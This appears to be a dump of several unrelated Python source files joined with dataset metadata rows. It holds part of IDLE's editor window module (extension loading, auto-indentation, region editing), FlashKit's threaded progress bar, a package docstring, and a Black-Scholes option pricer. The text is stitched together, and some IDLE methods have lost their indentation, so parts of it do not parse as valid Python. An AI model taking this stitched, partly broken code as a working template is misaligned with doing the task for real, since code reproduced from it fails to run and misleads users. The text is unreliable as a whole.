def close(self):
reply = self.maybesave()
if str(reply) != "cancel":
self._close()
return reply
    def _close(self):
        """Tear down the window unconditionally (after maybesave)."""
        if self.io.filename:
            self.update_recent_files_list(new_file=self.io.filename)
        window.unregister_callback(self.postwindowsmenu)
        self.unload_extensions()
        # Break reference cycles and release resources in dependency order.
        self.io.close()
        self.io = None
        self.undo = None
        if self.color:
            self.color.close(False)
            self.color = None
        self.text = None
        self.tkinter_vars = None
        self.per.close()
        self.per = None
        self.top.destroy()
        if self.close_hook:
            # unless override: unregister from flist, terminate if last window
            self.close_hook()
def load_extensions(self):
self.extensions = {}
self.load_standard_extensions()
def unload_extensions(self):
for ins in list(self.extensions.values()):
if hasattr(ins, "close"):
ins.close()
self.extensions = {}
def load_standard_extensions(self):
for name in self.get_standard_extension_names():
try:
self.load_extension(name)
except:
print("Failed to load extension", repr(name))
traceback.print_exc()
    def get_standard_extension_names(self):
        """Return names of extensions enabled for editor windows."""
        return idleConf.GetExtensions(editor_only=True)

    # Map built-in config-extension section names to file names.
    extfiles = {
        'ZzDummy': 'zzdummy',
    }
    def load_extension(self, name):
        """Import extension *name*, instantiate it, and wire its menus/keys."""
        fname = self.extfiles.get(name, name)
        try:
            try:
                # Prefer a package-relative import of the extension module.
                mod = importlib.import_module('.' + fname, package=__package__)
            except (ImportError, TypeError):
                mod = importlib.import_module(fname)
        except ImportError:
            print("\nFailed to import extension: ", name)
            raise
        cls = getattr(mod, name)
        keydefs = idleConf.GetExtensionBindings(name)
        if hasattr(cls, "menudefs"):
            self.fill_menus(cls.menudefs, keydefs)
        ins = cls(self)
        self.extensions[name] = ins
        if keydefs:
            self.apply_bindings(keydefs)
            for vevent in keydefs:
                # Map "<<some-event>>" to a handler named "some_event_event".
                methodname = vevent.replace("-", "_")
                while methodname[:1] == '<':
                    methodname = methodname[1:]
                while methodname[-1:] == '>':
                    methodname = methodname[:-1]
                methodname = methodname + "_event"
                if hasattr(ins, methodname):
                    self.text.bind(vevent, getattr(ins, methodname))

    def apply_bindings(self, keydefs=None):
        """Bind each virtual event to its key sequences on the text widget."""
        if keydefs is None:
            keydefs = self.mainmenu.default_keydefs
        text = self.text
        text.keydefs = keydefs
        for event, keylist in keydefs.items():
            if keylist:
                text.event_add(event, *keylist)
    def fill_menus(self, menudefs=None, keydefs=None):
        """Add appropriate entries to the menus and submenus.

        Menus that are absent or None in self.menudict are ignored.
        """
        if menudefs is None:
            menudefs = self.mainmenu.menudefs
        if keydefs is None:
            keydefs = self.mainmenu.default_keydefs
        menudict = self.menudict
        text = self.text
        for mname, entrylist in menudefs:
            menu = menudict.get(mname)
            if not menu:
                continue
            for entry in entrylist:
                if not entry:
                    # A falsy entry marks a separator line.
                    menu.add_separator()
                else:
                    label, eventname = entry
                    # A leading '!' marks a checkbutton entry.
                    checkbutton = (label[:1] == '!')
                    if checkbutton:
                        label = label[1:]
                    underline, label = prepstr(label)
                    accelerator = get_accelerator(keydefs, eventname)
                    # Default args bind the current values, avoiding the
                    # late-binding-closure pitfall inside this loop.
                    def command(text=text, eventname=eventname):
                        text.event_generate(eventname)
                    if checkbutton:
                        var = self.get_var_obj(eventname, BooleanVar)
                        menu.add_checkbutton(label=label, underline=underline,
                                             command=command, accelerator=accelerator,
                                             variable=var)
                    else:
                        menu.add_command(label=label, underline=underline,
                                         command=command,
                                         accelerator=accelerator)
    def getvar(self, name):
        """Return the value of the Tk variable for event *name*.

        Raises NameError if no such variable exists.
        """
        var = self.get_var_obj(name)
        if var:
            value = var.get()
            return value
        else:
            raise NameError(name)

    def setvar(self, name, value, vartype=None):
        """Set the Tk variable for *name*, creating it if *vartype* is given.

        Raises NameError if the variable is absent and no vartype was supplied.
        """
        var = self.get_var_obj(name, vartype)
        if var:
            var.set(value)
        else:
            raise NameError(name)

    def get_var_obj(self, name, vartype=None):
        """Return the Tk Variable for *name*, creating one on first use."""
        var = self.tkinter_vars.get(name)
        if not var and vartype:
            # create a Tkinter variable object with self.text as master:
            self.tkinter_vars[name] = var = vartype(self.text)
        return var
# Tk implementations of "virtual text methods" -- each platform
# reusing IDLE's support code needs to define these for its GUI's
# flavor of widget.
# Is character at text_index in a Python string? Return 0 for
# "guaranteed no", true for anything else. This info is expensive
# to compute ab initio, but is probably already known by the
# platform's colorizer.
    def is_char_in_string(self, text_index):
        """Return 0 only when the char at text_index is guaranteed not to be
        inside a Python string; any other (truthy) value means "maybe"."""
        if self.color:
            # Return true iff colorizer hasn't (re)gotten this far
            # yet, or the character is tagged as being in a string
            return self.text.tag_prevrange("TODO", text_index) or \
                   "STRING" in self.text.tag_names(text_index)
        else:
            # The colorizer is missing: assume the worst
            return 1

    # If a selection is defined in the text widget, return (start,
    # end) as Tkinter text indices, otherwise return (None, None)
    def get_selection_indices(self):
        try:
            first = self.text.index("sel.first")
            last = self.text.index("sel.last")
            return first, last
        except TclError:
            # No "sel" tag set -> no selection.
            return None, None
# Return the text widget's current view of what a tab stop means
# (equivalent width in spaces).
    # Return the text widget's current view of what a tab stop means
    # (equivalent width in spaces).
    def get_tk_tabwidth(self):
        current = self.text['tabs'] or TK_TABWIDTH_DEFAULT
        return int(current)

    # Set the text widget's current view of what a tab stop means.
    def set_tk_tabwidth(self, newtabwidth):
        text = self.text
        if self.get_tk_tabwidth() != newtabwidth:
            # Set text widget tab width
            pixels = text.tk.call("font", "measure", text["font"],
                                  "-displayof", text.master,
                                  "n" * newtabwidth)
            text.configure(tabs=pixels)

    ### begin autoindent code ### (configuration was moved to beginning of class)

    def set_indentation_params(self, is_py_src, guess=True):
        """For Python sources, optionally guess the indent width from the
        file content and switch to spaces when it differs from tab width."""
        if is_py_src and guess:
            i = self.guess_indent()
            if 2 <= i <= 8:
                self.indentwidth = i
            if self.indentwidth != self.tabwidth:
                self.usetabs = False
        self.set_tk_tabwidth(self.tabwidth)
    def smart_backspace_event(self, event):
        """Backspace that deletes whitespace back to the previous virtual
        tab stop, or deletes the selection / preceding char otherwise."""
        text = self.text
        first, last = self.get_selection_indices()
        if first and last:
            # A selection exists: plain delete of the selection.
            text.delete(first, last)
            text.mark_set("insert", first)
            return "break"
        # Delete whitespace left, until hitting a real char or closest
        # preceding virtual tab stop.
        chars = text.get("insert linestart", "insert")
        if chars == '':
            if text.compare("insert", ">", "1.0"):
                # easy: delete preceding newline
                text.delete("insert-1c")
            else:
                text.bell()     # at start of buffer
            return "break"
        if chars[-1] not in " \t":
            # easy: delete preceding real char
            text.delete("insert-1c")
            return "break"
        # Ick. It may require *inserting* spaces if we back up over a
        # tab character! This is written to be clear, not fast.
        tabwidth = self.tabwidth
        have = len(chars.expandtabs(tabwidth))
        assert have > 0
        want = ((have - 1) // self.indentwidth) * self.indentwidth
        # Debug prompt is multilined....
        ncharsdeleted = 0
        while 1:
            if chars == self.prompt_last_line:  # '' unless PyShell
                break
            chars = chars[:-1]
            ncharsdeleted = ncharsdeleted + 1
            have = len(chars.expandtabs(tabwidth))
            if have <= want or chars[-1] not in " \t":
                break
        # Do the delete (and possible pad) as a single undo unit.
        text.undo_block_start()
        text.delete("insert-%dc" % ncharsdeleted, "insert")
        if have < want:
            text.insert("insert", ' ' * (want - have))
        text.undo_block_stop()
        return "break"
    def smart_indent_event(self, event):
        """Tab key: indent a multiline selection, replace an intraline
        selection, or advance the cursor to the next indent stop."""
        # if intraline selection:
        #     delete it
        # elif multiline selection:
        #     do indent-region
        # else:
        #     indent one level
        text = self.text
        first, last = self.get_selection_indices()
        text.undo_block_start()
        try:
            if first and last:
                if index2line(first) != index2line(last):
                    return self.indent_region_event(event)
                text.delete(first, last)
                text.mark_set("insert", first)
            prefix = text.get("insert linestart", "insert")
            raw, effective = classifyws(prefix, self.tabwidth)
            if raw == len(prefix):
                # only whitespace to the left
                self.reindent_to(effective + self.indentwidth)
            else:
                # tab to the next 'stop' within or to right of line's text:
                if self.usetabs:
                    pad = '\t'
                else:
                    effective = len(prefix.expandtabs(self.tabwidth))
                    n = self.indentwidth
                    pad = ' ' * (n - effective % n)
                text.insert("insert", pad)
            text.see("insert")
            return "break"
        finally:
            text.undo_block_stop()
    def newline_and_indent_event(self, event):
        """Enter key: insert a newline and auto-indent the new line.

        Uses pyparse to classify the statement in progress (open bracket,
        backslash continuation, unterminated string, or a fresh statement)
        and indents accordingly.
        """
        text = self.text
        first, last = self.get_selection_indices()
        text.undo_block_start()
        try:
            if first and last:
                text.delete(first, last)
                text.mark_set("insert", first)
            line = text.get("insert linestart", "insert")
            # Find the end of the leading whitespace of the current line.
            i, n = 0, len(line)
            while i < n and line[i] in " \t":
                i = i+1
            if i == n:
                # the cursor is in or at leading indentation in a continuation
                # line; just inject an empty line at the start
                text.insert("insert linestart", '\n')
                return "break"
            indent = line[:i]
            # strip whitespace before insert point unless it's in the prompt
            i = 0
            while line and line[-1] in " \t" and line != self.prompt_last_line:
                line = line[:-1]
                i = i+1
            if i:
                text.delete("insert - %d chars" % i, "insert")
            # strip whitespace after insert point
            while text.get("insert") in " \t":
                text.delete("insert")
            # start new line
            text.insert("insert", '\n')

            # adjust indentation for continuations and block
            # open/close first need to find the last stmt
            lno = index2line(text.index('insert'))
            y = pyparse.Parser(self.indentwidth, self.tabwidth)
            if not self.context_use_ps1:
                # Widen the context window until a good parse start is found.
                for context in self.num_context_lines:
                    startat = max(lno - context, 1)
                    startatindex = repr(startat) + ".0"
                    rawtext = text.get(startatindex, "insert")
                    y.set_code(rawtext)
                    bod = y.find_good_parse_start(
                              self.context_use_ps1,
                              self._build_char_in_string_func(startatindex))
                    if bod is not None or startat == 1:
                        break
                y.set_lo(bod or 0)
            else:
                # Shell-style: parse only from the last console prompt.
                r = text.tag_prevrange("console", "insert")
                if r:
                    startatindex = r[1]
                else:
                    startatindex = "1.0"
                rawtext = text.get(startatindex, "insert")
                y.set_code(rawtext)
                y.set_lo(0)

            c = y.get_continuation_type()
            if c != pyparse.C_NONE:
                # The current stmt hasn't ended yet.
                if c == pyparse.C_STRING_FIRST_LINE:
                    # after the first line of a string; do not indent at all
                    pass
                elif c == pyparse.C_STRING_NEXT_LINES:
                    # inside a string which started before this line;
                    # just mimic the current indent
                    text.insert("insert", indent)
                elif c == pyparse.C_BRACKET:
                    # line up with the first (if any) element of the
                    # last open bracket structure; else indent one
                    # level beyond the indent of the line with the
                    # last open bracket
                    self.reindent_to(y.compute_bracket_indent())
                elif c == pyparse.C_BACKSLASH:
                    # if more than one line in this stmt already, just
                    # mimic the current indent; else if initial line
                    # has a start on an assignment stmt, indent to
                    # beyond leftmost =; else to beyond first chunk of
                    # non-whitespace on initial line
                    if y.get_num_lines_in_stmt() > 1:
                        text.insert("insert", indent)
                    else:
                        self.reindent_to(y.compute_backslash_indent())
                else:
                    assert 0, "bogus continuation type %r" % (c,)
                return "break"

            # This line starts a brand new stmt; indent relative to
            # indentation of initial line of closest preceding
            # interesting stmt.
            indent = y.get_base_indent_string()
            text.insert("insert", indent)
            if y.is_block_opener():
                self.smart_indent_event(event)
            elif indent and y.is_block_closer():
                self.smart_backspace_event(event)
            return "break"
        finally:
            text.see("insert")
            text.undo_block_stop()
# Our editwin provides an is_char_in_string function that works
# with a Tk text index, but PyParse only knows about offsets into
# a string. This builds a function for PyParse that accepts an
# offset.
    def _build_char_in_string_func(self, startindex):
        """Adapt is_char_in_string (Tk-index based) into a PyParse-style
        callable taking a character offset from *startindex*."""
        def inner(offset, _startindex=startindex,
                  _icis=self.is_char_in_string):
            # Translate the offset into a Tk index: "<start>+<offset>c".
            return _icis(_startindex + "+%dc" % offset)
        return inner

    def indent_region_event(self, event):
        """Shift every non-empty line of the region right one indent level."""
        head, tail, chars, lines = self.get_region()
        for pos in range(len(lines)):
            line = lines[pos]
            if line:
                raw, effective = classifyws(line, self.tabwidth)
                effective = effective + self.indentwidth
                lines[pos] = self._make_blanks(effective) + line[raw:]
        self.set_region(head, tail, chars, lines)
        return "break"
    def dedent_region_event(self, event):
        """Shift every non-empty line of the region left one indent level."""
        head, tail, chars, lines = self.get_region()
        for pos in range(len(lines)):
            line = lines[pos]
            if line:
                raw, effective = classifyws(line, self.tabwidth)
                # Never dedent below column 0.
                effective = max(effective - self.indentwidth, 0)
                lines[pos] = self._make_blanks(effective) + line[raw:]
        self.set_region(head, tail, chars, lines)
        return "break"

    def comment_region_event(self, event):
        """Prefix each line of the region with '##'."""
        head, tail, chars, lines = self.get_region()
        # len(lines) - 1: the final element of the split is the text after
        # the trailing newline, which must stay untouched.
        for pos in range(len(lines) - 1):
            line = lines[pos]
            lines[pos] = '##' + line
        self.set_region(head, tail, chars, lines)
        return "break"

    def uncomment_region_event(self, event):
        """Strip a leading '##' (or single '#') from each line of the region."""
        head, tail, chars, lines = self.get_region()
        for pos in range(len(lines)):
            line = lines[pos]
            if not line:
                continue
            if line[:2] == '##':
                line = line[2:]
            elif line[:1] == '#':
                line = line[1:]
            lines[pos] = line
        self.set_region(head, tail, chars, lines)
        return "break"
    def tabify_region_event(self, event):
        """Convert leading whitespace of each region line to tabs + spaces."""
        head, tail, chars, lines = self.get_region()
        tabwidth = self._asktabwidth()
        if tabwidth is None: return  # dialog cancelled
        for pos in range(len(lines)):
            line = lines[pos]
            if line:
                raw, effective = classifyws(line, tabwidth)
                ntabs, nspaces = divmod(effective, tabwidth)
                lines[pos] = '\t' * ntabs + ' ' * nspaces + line[raw:]
        self.set_region(head, tail, chars, lines)
        return "break"

    def untabify_region_event(self, event):
        """Expand all tabs in the region to spaces."""
        head, tail, chars, lines = self.get_region()
        tabwidth = self._asktabwidth()
        if tabwidth is None: return  # dialog cancelled
        for pos in range(len(lines)):
            lines[pos] = lines[pos].expandtabs(tabwidth)
        self.set_region(head, tail, chars, lines)
        return "break"
    def toggle_tabs_event(self, event):
        """Ask the user, then flip between tab and space indentation."""
        if self.askyesno(
              "Toggle tabs",
              "Turn tabs " + ("on", "off")[self.usetabs] +
              "?\nIndent width " +
              ("will be", "remains at")[self.usetabs] + " 8." +
              "\n Note: a tab is always 8 columns",
              parent=self.text):
            self.usetabs = not self.usetabs
            # Try to prevent inconsistent indentation.
            # User must change indent width manually after using tabs.
            self.indentwidth = 8
        return "break"
# XXX this isn't bound to anything -- see tabwidth comments
## def change_tabwidth_event(self, event):
## new = self._asktabwidth()
## if new != self.tabwidth:
## self.tabwidth = new
## self.set_indentation_params(0, guess=0)
## return "break"
    def change_indentwidth_event(self, event):
        """Prompt for a new space-indent width; ignored while tabs are in use."""
        new = self.askinteger(
                  "Indent width",
                  "New indent width (2-16)\n(Always use 8 when using tabs)",
                  parent=self.text,
                  initialvalue=self.indentwidth,
                  minvalue=2,
                  maxvalue=16)
        if new and new != self.indentwidth and not self.usetabs:
            self.indentwidth = new
        return "break"
    def get_region(self):
        """Return (head, tail, chars, lines) covering the selection's whole
        lines, or the current line when nothing is selected."""
        text = self.text
        first, last = self.get_selection_indices()
        if first and last:
            head = text.index(first + " linestart")
            tail = text.index(last + "-1c lineend +1c")
        else:
            head = text.index("insert linestart")
            tail = text.index("insert lineend +1c")
        chars = text.get(head, tail)
        lines = chars.split("\n")
        return head, tail, chars, lines

    def set_region(self, head, tail, chars, lines):
        """Replace the region with *lines* as one undo unit and reselect it."""
        text = self.text
        newchars = "\n".join(lines)
        if newchars == chars:
            # Nothing changed: beep instead of polluting the undo stack.
            text.bell()
            return
        text.tag_remove("sel", "1.0", "end")
        text.mark_set("insert", head)
        text.undo_block_start()
        text.delete(head, tail)
        text.insert(head, newchars)
        text.undo_block_stop()
        text.tag_add("sel", head, "insert")
    # Make string that displays as n leading blanks.
    def _make_blanks(self, n):
        """Return whitespace that displays as *n* columns, preferring tabs
        when self.usetabs is set."""
        if self.usetabs:
            ntabs, nspaces = divmod(n, self.tabwidth)
            return '\t' * ntabs + ' ' * nspaces
        else:
            return ' ' * n

    # Delete from beginning of line to insert point, then reinsert
    # column logical (meaning use tabs if appropriate) spaces.
    def reindent_to(self, column):
        text = self.text
        text.undo_block_start()
        if text.compare("insert linestart", "!=", "insert"):
            text.delete("insert linestart", "insert")
        if column:
            text.insert("insert", self._make_blanks(column))
        text.undo_block_stop()

    def _asktabwidth(self):
        """Prompt for a tab width; returns None if the dialog is cancelled."""
        return self.askinteger(
            "Tab width",
            "Columns per tab? (2-16)",
            parent=self.text,
            initialvalue=self.indentwidth,
            minvalue=2,
            maxvalue=16)
    # Guess indentwidth from text content.
    # Return guessed indentwidth. This should not be believed unless
    # it's in a reasonable range (e.g., it will be 0 if no indented
    # blocks are found).
    def guess_indent(self):
        """Infer indent width from the first block opener / indented stmt pair."""
        opener, indented = IndentSearcher(self.text, self.tabwidth).run()
        if opener and indented:
            raw, indentsmall = classifyws(opener, self.tabwidth)
            raw, indentlarge = classifyws(indented, self.tabwidth)
        else:
            indentsmall = indentlarge = 0
        return indentlarge - indentsmall
# "line.col" -> line, as an int
def index2line(index):
    """Convert a Tk text index such as '12.5' to its integer line number."""
    numeric = float(index)
    return int(numeric)
# Look at the leading whitespace in s.
# Return pair (# of leading ws characters,
# effective # of leading blanks after expanding
# tabs to width tabwidth)
def classifyws(s, tabwidth):
    """Examine the leading whitespace of *s*.

    Returns (raw, effective): the number of leading whitespace characters,
    and the number of display columns they occupy once tabs are expanded
    to *tabwidth*.
    """
    raw = 0
    effective = 0
    for ch in s:
        if ch == ' ':
            effective += 1
        elif ch == '\t':
            # Advance to the next tab stop.
            effective = (effective // tabwidth + 1) * tabwidth
        else:
            break
        raw += 1
    return raw, effective
class IndentSearcher(object):

    # .run() chews over the Text widget, looking for a block opener
    # and the stmt following it. Returns a pair,
    #     (line containing block opener, line containing stmt)
    # Either or both may be None.

    def __init__(self, text, tabwidth):
        self.text = text
        self.tabwidth = tabwidth
        # i: number of lines already fed to the tokenizer; finished: stop flag.
        self.i = self.finished = 0
        self.blkopenline = self.indentedline = None

    def readline(self):
        """File-like readline over the Text widget, for the tokenizer."""
        if self.finished:
            return ""
        i = self.i = self.i + 1
        mark = repr(i) + ".0"
        if self.text.compare(mark, ">=", "end"):
            return ""
        return self.text.get(mark, mark + " lineend+1c")

    def tokeneater(self, type, token, start, end, line,
                   INDENT=tokenize.INDENT,
                   NAME=tokenize.NAME,
                   OPENERS=('class', 'def', 'for', 'if', 'try', 'while')):
        """Record the first block-opener line and the first indented line."""
        if self.finished:
            pass
        elif type == NAME and token in OPENERS:
            self.blkopenline = line
        elif type == INDENT and self.blkopenline:
            self.indentedline = line
            self.finished = 1

    def run(self):
        # Temporarily patch the tokenizer's tab size to match the widget,
        # restoring it afterwards.
        save_tabsize = tokenize.tabsize
        tokenize.tabsize = self.tabwidth
        try:
            try:
                tokens = tokenize.generate_tokens(self.readline)
                for token in tokens:
                    self.tokeneater(*token)
            except (tokenize.TokenError, SyntaxError):
                # since we cut off the tokenizer early, we can trigger
                # spurious errors
                pass
        finally:
            tokenize.tabsize = save_tabsize
        return self.blkopenline, self.indentedline
### end autoindent code ###
def prepstr(s):
    """Extract the mnemonic underscore from a menu label.

    Returns (index, label): the position of the first '_' (-1 when absent)
    and the label with that underscore removed, e.g. "Co_py" -> (2, "Copy").
    """
    pos = s.find('_')
    if pos < 0:
        return pos, s
    return pos, s[:pos] + s[pos + 1:]
# Friendlier display names for Tk keysyms used in menu accelerators.
keynames = {
    'bracketleft': '[',
    'bracketright': ']',
    'slash': '/',
}
def get_accelerator(keydefs, eventname):
    """Return a human-readable accelerator label (e.g. "Ctrl+X") for the
    first key sequence bound to *eventname*, or "" when none applies."""
    keylist = keydefs.get(eventname)
    # issue10940: temporary workaround to prevent hang with OS X Cocoa Tk 8.5
    # if not keylist:
    if (not keylist) or (macosx.isCocoaTk() and eventname in {
                            "<<open-module>>",
                            "<<goto-line>>",
                            "<<change-indentwidth>>"}):
        return ""
    s = keylist[0]
    # Normalize a Tk sequence like "<Control-Key-x>" into "Ctrl+X".
    s = re.sub(r"-[a-z]\b", lambda m: m.group().upper(), s)
    s = re.sub(r"\b\w+\b", lambda m: keynames.get(m.group(), m.group()), s)
    s = re.sub("Key-", "", s)
    s = re.sub("Cancel","Ctrl-Break",s)   # dscherer@cmu.edu
    s = re.sub("Control-", "Ctrl-", s)
    s = re.sub("-", "+", s)
    s = re.sub("><", " ", s)
    s = re.sub("<", "", s)
    s = re.sub(">", "", s)
    return s
def fixwordbreaks(root):
    """Make Tcl/Tk use Motif-style word boundaries on every platform."""
    # On Windows, tcl/tk breaks 'words' only on spaces, as in Command Prompt.
    # We want Motif style everywhere. See #21474, msg218992 and followup.
    tk = root.tk
    tk.call('tcl_wordBreakAfter', 'a b', 0)  # make sure word.tcl is loaded
    tk.call('set', 'tcl_wordchars', r'\w')
    tk.call('set', 'tcl_nonwordchars', r'\W')
def _editor_window(parent):  # htest #
    """Open a demo EditorWindow with sample content, for human testing."""
    # error if close master window first - timer event, after script
    root = parent
    fixwordbreaks(root)
    if sys.argv[1:]:
        filename = sys.argv[1]
    else:
        filename = None
    macosx.setupApp(root, None)
    edit = EditorWindow(root=root, filename=filename)
    text = edit.text
    text['height'] = 10
    # Fill the buffer with progressively indented numbered lines.
    for i in range(20):
        text.insert('insert', ' '*i + str(i) + '\n')
    # text.bind("<<close-all-windows>>", edit.close_event)
    # Does not stop error, neither does following
    # edit.text.bind("<<close-window>>", edit.close_event)
if __name__ == '__main__':
    # Run the editor unit tests, then show the htest demo window.
    from unittest import main
    main('idlelib.idle_test.test_editor', verbosity=2, exit=False)

    from idlelib.idle_test.htest import run
    run(_editor_window)
| 38.970622 | 95 | 0.568903 |
276666bce4fa21c7f07262b79b6a8c874f49d7c5 | 4,915 | py | Python | src/flashkit/core/progress.py | akashdhruv/FlashKit | dac777c52795098b75ab4875440d232efa1b0973 | [
"MIT"
] | 2 | 2022-02-01T02:41:24.000Z | 2022-02-11T20:58:03.000Z | src/flashkit/core/progress.py | akashdhruv/FlashKit | dac777c52795098b75ab4875440d232efa1b0973 | [
"MIT"
] | 39 | 2021-06-07T04:08:54.000Z | 2022-01-14T14:50:52.000Z | src/flashkit/core/progress.py | akashdhruv/FlashKit | dac777c52795098b75ab4875440d232efa1b0973 | [
"MIT"
] | 1 | 2022-02-11T20:58:20.000Z | 2022-02-11T20:58:20.000Z | """Povides progress bar support for FlashKit library."""
# type annotations
from __future__ import annotations
from typing import TYPE_CHECKING
# standard libraries
import logging
import pkg_resources
import threading
import time
import sys
from contextlib import AbstractContextManager, nullcontext
# internal libraries
from .parallel import is_parallel
from ..resources import CONFIG
# static analysis
if TYPE_CHECKING:
from typing import Any, Callable, Optional, Union
Bar = Callable[..., AbstractContextManager]
# deal w/ runtime import
else:
Bar = None
logger = logging.getLogger(__name__)
# define public interface
__all__ = ['SimpleBar', 'get_bar', 'null_bar', 'attach_context', ]
# define default constants
BLANKING = CONFIG['core']['progress']['blanking']
CYCLINGS = CONFIG['core']['progress']['cyclings']
ENTRANCE = CONFIG['core']['progress']['entrance']
PROGRESS = CONFIG['core']['progress']['progress']
SENTINAL = CONFIG['core']['progress']['sentinal']
TERMINAL = CONFIG['core']['progress']['terminal']
UPDATING = CONFIG['core']['progress']['updating']
def null_bar(*_) -> AbstractContextManager:
    """No-op progress "bar": a context manager whose value is a do-nothing
    update callable; any positional arguments are ignored."""
    def _noop(*_args) -> None:
        return None
    return nullcontext(_noop)
def set_message(message: str) -> None:
    """Provides a message capability to the progress bar."""
    # Stored on the class so every SimpleBar instance shows it on redraw.
    SimpleBar.message = message
class SimpleBar(threading.Thread):
    """Implements a simple, threaded, context manager for a progress bar."""

    # Rendering defaults, sourced from package CONFIG.
    progress: int = PROGRESS    # bar width in characters
    terminal: int = TERMINAL    # column width used to pad each redraw
    sentinal: str = SENTINAL    # fill char for the completed portion
    blanking: str = BLANKING    # fill char for the remaining portion
    entrance: str = ENTRANCE    # prefix printed before the bar
    cyclings: float = CYCLINGS  # seconds per sweep when total is unknown
    message: str = ''           # trailing message (see set_message)

    def __enter__(self) -> Callable[[], None]:
        # Start the drawing thread and hand the update callback to the caller.
        self.start()
        return self.update

    def __exit__(self, *args, **kwargs) -> None:
        # Draw the final summary line, then stop the drawing thread.
        self.calculate()
        self.flush(self.final())
        self.stop_event.set()

    def __init__(self, total: Optional[int] = None, *, fps: float = UPDATING):
        threading.Thread.__init__(self, name='Progress')
        self.stop_event = threading.Event()
        self.sleep = 1.0 / fps
        if total is not None:
            self.known = True
            self.total = total
        else:
            self.known = False
            self.total = 1
        # Select renderers once, based on whether the total is known.
        self.write = self.write_known if self.known else self.write_unknown
        self.final = self.final_known if self.known else self.final_unknown
        self.clock = time.time()
        self.click = 0  # completed work units

    def calculate(self) -> None:
        """Refresh elapsed time, rate, and the done/left bar segments."""
        self.last = time.time() - self.clock
        # Avoid a misleading rate spike during the first second.
        self.rate = self.click / self.last if self.last > 1.0 else 0.0
        self.frac = self.click / self.total * 100
        if self.known:
            done = int(min(1, self.click / self.total) * self.progress)
        else:
            # Unknown total: animate a repeating sweep from wall-clock time.
            done = int((self.last % self.cyclings) / self.cyclings * self.progress)
        self.done = self.sentinal * done
        self.left = self.blanking * (self.progress - done)

    def final_known(self) -> str:
        """Final summary line when the total was known."""
        return f'{self.entrance}|{self.done}| {self.click}/{self.total} [{100.0:.0f}%] in {self.last:.1f}s ({self.rate:.2f}/s)\n'

    def final_unknown(self) -> str:
        """Final summary line when the total was unknown (bar drawn full)."""
        done = self.sentinal * self.progress
        return f'{self.entrance}|{done}| {self.click} in {self.last:.1f}s ({self.rate:.2f}/s)\n'

    def flush(self, message: str) -> None:
        # '\r' keeps redrawing on the same terminal line.
        print(message.ljust(self.terminal), end='\r')

    def update(self) -> None:
        """Advance the bar by one completed unit of work."""
        self.click += 1
    # Expose a .text attribute on the update callable -- presumably for
    # API parity with alive_progress's bar.text(); confirm before relying.
    update.text = set_message  # type: ignore

    def run(self) -> None:
        # Drawing loop: redraw at roughly *fps* until __exit__ sets the event.
        while not self.stop_event.is_set():
            time.sleep(self.sleep)
            self.calculate()
            self.flush(self.write())

    def write_known(self) -> str:
        """In-progress line when the total is known."""
        return f'{self.entrance}|{self.done}{self.left}| {self.click}/{self.total} [{self.frac:.0f}%] in {self.last:.1f}s ({self.rate:.2f}/s) {self.message}'

    def write_unknown(self) -> str:
        """In-progress line when the total is unknown."""
        return f'{self.entrance}|{self.done}{self.left}| {self.click} in {self.last:.1f}s ({self.rate:.2f}/s) {self.message}'
def get_bar(*, null: bool = False) -> Bar:
    """Retrieve the best supported progress bar at runtime."""
    if null: return null_bar #NULL_BAR
    # Parallel execution always uses the bundled SimpleBar.
    if is_parallel(): return SimpleBar
    try:
        # Prefer the third-party alive_progress bar when it is installed.
        pkg_resources.get_distribution('alive_progress')
        from alive_progress import alive_bar, config_handler # type: ignore
        config_handler.set_global(theme='smooth', unknown='horizontal')
        return alive_bar
    except pkg_resources.DistributionNotFound:
        return SimpleBar

def attach_context(**args: Any) -> dict[str, Any]:
    """Provide a useful progress bar if appropriate; may throw if some defaults are missing."""
    # Only attach a live bar when stdout is an interactive terminal.
    noattach = not sys.stdout.isatty()
    args['context'] = get_bar(null=noattach)
    if not noattach: logger.debug(f'api -- Attached a dynamic progress context')
    return args
| 34.858156 | 157 | 0.646796 |
a022e1cf1b3cb88c4e83909831891354185952da | 196 | py | Python | washing_learning/vision/__init__.py | Lucas-rbnt/washing-learning | eb3e8bcc7c58dafc19bfb94779c681c1164524e7 | [
"MIT"
] | 8 | 2021-04-13T09:12:38.000Z | 2021-11-02T08:50:29.000Z | washing_learning/vision/__init__.py | Lucas-rbnt/washing-learning | eb3e8bcc7c58dafc19bfb94779c681c1164524e7 | [
"MIT"
] | null | null | null | washing_learning/vision/__init__.py | Lucas-rbnt/washing-learning | eb3e8bcc7c58dafc19bfb94779c681c1164524e7 | [
"MIT"
] | null | null | null | """
This API provides classes and functions that eliminate boilerplate and keep user code
higher-level. This module focuses solely on Computer Vision tasks.
"""
| 39.2 | 119 | 0.790816 |
9548cfaffaf3d5f4342233503cea008afb609add | 1,427 | py | Python | option_pricer/black_scholes.py | tsengkasing/option-pricer | 89fff55070834698d801f3a6eb10e16d40fc7762 | [
"MIT"
] | null | null | null | option_pricer/black_scholes.py | tsengkasing/option-pricer | 89fff55070834698d801f3a6eb10e16d40fc7762 | [
"MIT"
] | null | null | null | option_pricer/black_scholes.py | tsengkasing/option-pricer | 89fff55070834698d801f3a6eb10e16d40fc7762 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from math import log, sqrt, e
import scipy.stats as si
def black_scholes(option_type, S, K, T, sigma, r, q):
    """Price a European option with the Black-Scholes formula.

    :param option_type: string, 'call' | 'put'.
    :param S: spot price.
    :param K: strike price.
    :param T: time to maturity, in years.
    :param sigma: volatility of the underlying asset.
    :param r: risk-free interest rate.
    :param q: repo rate.
    :return: value of the call or put option.
    :raises Exception: when option_type is neither 'call' nor 'put'.
    """
    vol_sqrt_t = sigma * sqrt(T)
    drift = (log(S / K) + (r - q) * T) / vol_sqrt_t
    d1 = drift + 0.5 * vol_sqrt_t
    d2 = drift - 0.5 * vol_sqrt_t
    discounted_spot = S * e ** (-q * T)
    discounted_strike = K * e ** (-r * T)
    if option_type == 'call':
        return discounted_spot * si.norm.cdf(d1, 0.0, 1.0) - discounted_strike * si.norm.cdf(d2, 0.0, 1.0)
    if option_type == 'put':
        return discounted_strike * si.norm.cdf(-d2, 0.0, 1.0) - discounted_spot * si.norm.cdf(-d1, 0.0, 1.0)
    raise Exception('Error Option Type')
# For testing
if __name__ == '__main__':
    call_option = black_scholes(option_type='call', S=100, K=100, T=0.5, sigma=0.2, r=0.01, q=0.2)
    put_option = black_scholes(option_type='put', S=100, K=100, T=0.5, sigma=0.2, r=0.01, q=0.2)
